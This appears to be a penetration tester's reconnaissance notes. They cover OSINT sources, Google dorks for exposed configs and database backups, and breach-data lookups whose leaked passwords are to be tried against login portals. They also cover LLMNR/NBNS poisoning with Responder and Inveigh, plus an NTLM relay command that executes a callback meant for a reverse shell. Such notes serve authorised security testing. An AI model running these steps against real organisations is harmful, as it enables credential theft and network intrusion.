3 - Info Gathering

Passive Information Gathering

Enumeration

Primary source of information will be:

scoping document (in-scope assets)
passive OSINT

No.	Principle
1.	There is more than meets the eye. Consider all points of view.
2.	Distinguish between what we see and what we do not see.
3.	There are always ways to gain more information. Understand the target.

Layer	Name	Goal / Purpose
1	Internet Presence	Discover Assets: Identify all public-facing domains, subdomains, IPs, and netblocks.
2	Gateway	Analyze the Perimeter: Understand the target’s external interfaces and protection mechanisms (e.g., WAF, firewall).
3	Accessible Services	Enumerate Services: Identify and understand the function of every open port and running service on the discovered assets.
4	Processes	Understand Functionality: Analyze how data is processed by services and identify dependencies between inputs and outputs.
5	Privileges	Identify Permissions: Determine the privileges of each service’s user account and look for overlooked or excessive permissions.
6	OS Setup	Internal Recon: After gaining access, gather information on the OS configuration, security posture, and admin practices.

External Recon (OSINT)

Public DNS and domain ownership records
Email Addresses
- You can then use these to check if any have been involved in a breach or use Google Dorks to search for them on sites like Pastebin
Subdomains
Third-party vendors
Similar domains
Public cloud resources

Data Point	Description
`IP Space`	Valid ASN for our target, netblocks in use for the organization’s public-facing infrastructure, cloud presence and the hosting providers, DNS record entries, etc.
`Domain Information`	Based on IP data, DNS, and site registrations. Who administers the domain? Are there any subdomains tied to our target? Are there any publicly accessible domain services present? (Mailservers, DNS, Websites, VPN portals, etc.) Can we determine what kind of defenses are in place? (SIEM, AV, IPS/IDS in use, etc.)
`Schema Format`	Can we discover the organization’s email accounts, AD usernames, and even password policies? Anything that will give us information we can use to build a valid username list to test external-facing services for password spraying, credential stuffing, brute forcing, etc.
`Data Disclosures`	For data disclosures we will be looking for publicly accessible files ( .pdf, .ppt, .docx, .xlsx, etc. ) for any information that helps shed light on the target. For example, any published files that contain `intranet` site listings, user metadata, shares, or other critical software or hardware in the environment (credentials pushed to a public GitHub repo, the internal AD username format in the metadata of a PDF, for example.)
`Breach Data`	Any publicly released usernames, passwords, or other critical information that can help an attacker gain a foothold.

And where to find that above information…

Resource	Examples
`ASN / IP registrars`	IANA, arin for searching the Americas, RIPE for searching in Europe, BGP Toolkit
`Domain Registrars & DNS`	Domaintools, PTRArchive, ICANN, manual DNS record requests against the domain in question or against well known DNS servers, such as `8.8.8.8`.
`Social Media`	Searching Linkedin, Twitter, Facebook, your region’s major social media sites, news articles, and any relevant info you can find about the organization.
`Public-Facing Company Websites`	Often, the public website for a corporation will have relevant info embedded. News articles, embedded documents, and the “About Us” and “Contact Us” pages can also be gold mines.
`Cloud & Dev Storage Spaces`	GitHub, AWS S3 buckets & Azure Blog storage containers, Google searches using “Dorks”
`Breach Data Sources`	HaveIBeenPwned to determine if any corporate email accounts appear in public breach data, Dehashed to search for corporate emails with cleartext passwords or hashes we can try to crack offline. We can then try these passwords against any exposed login portals (Citrix, RDS, OWA, 0365, VPN, VMware Horizon, custom applications, etc.) that may use AD authentication.

via DNS

Great to validate and discover new information, especially from IP and ASN searches.

https://whois.domaintools.com/
- Check ASN
https://viewdns.info/
- DNS (Local Namerservers): https://viewdns.info/dnsreport
- All Records: https://viewdns.info/dnsrecord

via Search Engine Dorking

See more about… Search Engine Dorking

Source: Docs > 3 - Info Gathering > search-engine-dorking

https://www.exploit-db.com/google-hacking-database
Cached Website: https://web.archive.org/

site:
inurl:
filetype:
intitle:
intext:
inbody:
cache:
link:
related:
info:
define:
numrange:
allintext:
allinurl:
allintitle:

# Operators
AND
OR
NOT
*
..
" "
-
+

### EXAMPLES
# Find Emails
inurl:<DOMAIN> intext:"@<DOMAIN>"

# Finding Login Pages:
site:<DOMAIN> inurl:login
site:<DOMAIN> (inurl:login OR inurl:admin)

# Identifying Exposed Files:
site:<DOMAIN> filetype:pdf
site:<DOMAIN> (filetype:xls OR filetype:docx)
inurl:<DOMAIN> filetype:pdf  # !!! careful this one can show malicious site hosting cached files !!!

# Uncovering Configuration Files:
site:<DOMAIN> inurl:config.php

# (searches for extensions commonly used for configuration files)
site:<DOMAIN> (ext:conf OR ext:cnf)

# Locating Database Backups:
site:<DOMAIN> inurl:backup
site:<DOMAIN> filetype:sql

See more about… User Enumeration
Source: Docs > 7 - Lateral Movement > active-directory#user-enumeration
User Enumeration
“A tool to quickly bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication”
- https://github.com/ropnop/kerbrute
- Username Lists
  - https://github.com/initstring/linkedin2username
  - https://github.com/insidetrust/statistically-likely-usernames
- PowerShell Tool: https://github.com/dafthack/DomainPasswordSpray
See more about… User Enum
Source: Docs > 5 - Exploitation > online-credentials-attacks#user-enum
User Enum
No creds: Try anonymous sessions
Later: with credentials
See more about… Protocol Poisoners
Source: Docs > 5 - Exploitation > protocol-poisoners
These are a great way to passively enumerate or sniff for creds for traffic inside of the network.

Check various sites, especially for different types of IT admins, to skim information about hardware, software, or services used:

LinkedIn.com
Indeed.com
Glassdoor.com

via other Services

Leaked Creds: https://dehashed.com/
- https://github.com/sm00v/Dehashed
- curl 'https://api.dehashed.com/search?query=domain:target.com&size=1000' -u <EMAIL>:<API_KEY> -H 'Accept: application/json' > dehashed_results.json
Leaked Creds: https://github.com/trufflesecurity/truffleHog
Public (Data) Buckets: https://buckets.grayhatwarfare.com/

Internal Recon

Passively, sampling the traffic can be a great way to understand the network insofar as hosts, services, and maybe even sometimes credentials

See more about… Protocol Poisoners

Source: Docs > 5 - Exploitation > protocol-poisoners

These are a great way to passively enumerate or sniff for creds for traffic inside of the network.

Responder

https://github.com/lgandx/Responder
- Configuration services: /etc/responder/Responder.conf
  - CHECK FOR PORT CONFLICTS!
- Logs (creds) saved to: /usr/share/responder/logs/
Attacks the following protocols:
- LLMNR
- DNS
- MDNS
- NBNS
- DHCP
- ICMP
- HTTP
- HTTPS
- SMB
- LDAP
- WebDAV
- Proxy Auth
- MSSQL
- DCE-RPC
- FTP, POP3, IMAP, and SMTP auth

Passive (listen only)

Observe NBT-NS, BROWSER, LLMNR, etc. No responses sent – only capture broadcast traffic; no login prompts or relay.

sudo responder -I <INTERFACE> -A

Active (respond / relay)

Sends responses or relays auth: can trigger login prompts or relay hashes to a target

# Force WPAD; may cause a login prompt
sudo responder --wpad --ForceWpadAuth --verbose --interface=<INTERFACE>

# Relay NTLM to target and execute a callback (e.g. rev shell)
# nc -lvnp <PORT>
impacket-ntlmrelayx --no-http-server -smb2support -t <TARGET> -c '<POWERSHELL_CALLBACK>'

Inveigh

Windows-capable LLMNR/NBNS/mDNS/DNS spoofer and capture tool (NTLM, etc.); use the C# build (Inveigh.exe) – the PowerShell version is legacy and unmaintained.

https://github.com/Kevin-Robertson/Inveigh

# Download latest release (Windows x64, single-file trimmed build)
TAG=$(curl -s https://api.github.com/repos/Kevin-Robertson/Inveigh/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
wget "https://github.com/Kevin-Robertson/Inveigh/releases/download/$TAG/Inveigh-net10.0-win-x64-trimmed-single-$TAG.zip"
unzip "Inveigh-net10.0-win-x64-trimmed-single-$TAG.zip"

# Or build from repo (C#): open Inveigh.sln, build/publish for win-x64, or:
# dotnet publish -r win-x64 -c Release -p:PublishSingleFile=true

# Run with LLMNR + NBNS spoofing, full console output, and file output (all explicit)
.\Inveigh.exe -LLMNR Y -NBNS Y -Console 5 -FileOutput Y

# Sample the network traffic
sudo tcpdump -i <INTERFACE> -w <OUTPUT_FILE>

Search Engine Dorking

https://www.exploit-db.com/google-hacking-database
Cached Website: https://web.archive.org/

site:
inurl:
filetype:
intitle:
intext:
inbody:
cache:
link:
related:
info:
define:
numrange:
allintext:
allinurl:
allintitle:

# Operators
AND
OR
NOT
*
..
" "
-
+

### EXAMPLES
# Find Emails
inurl:<DOMAIN> intext:"@<DOMAIN>"

# Finding Login Pages:
site:<DOMAIN> inurl:login
site:<DOMAIN> (inurl:login OR inurl:admin)

# Identifying Exposed Files:
site:<DOMAIN> filetype:pdf
site:<DOMAIN> (filetype:xls OR filetype:docx)
inurl:<DOMAIN> filetype:pdf  # !!! careful this one can show malicious site hosting cached files !!!

# Uncovering Configuration Files:
site:<DOMAIN> inurl:config.php

# (searches for extensions commonly used for configuration files)
site:<DOMAIN> (ext:conf OR ext:cnf)

# Locating Database Backups:
site:<DOMAIN> inurl:backup
site:<DOMAIN> filetype:sql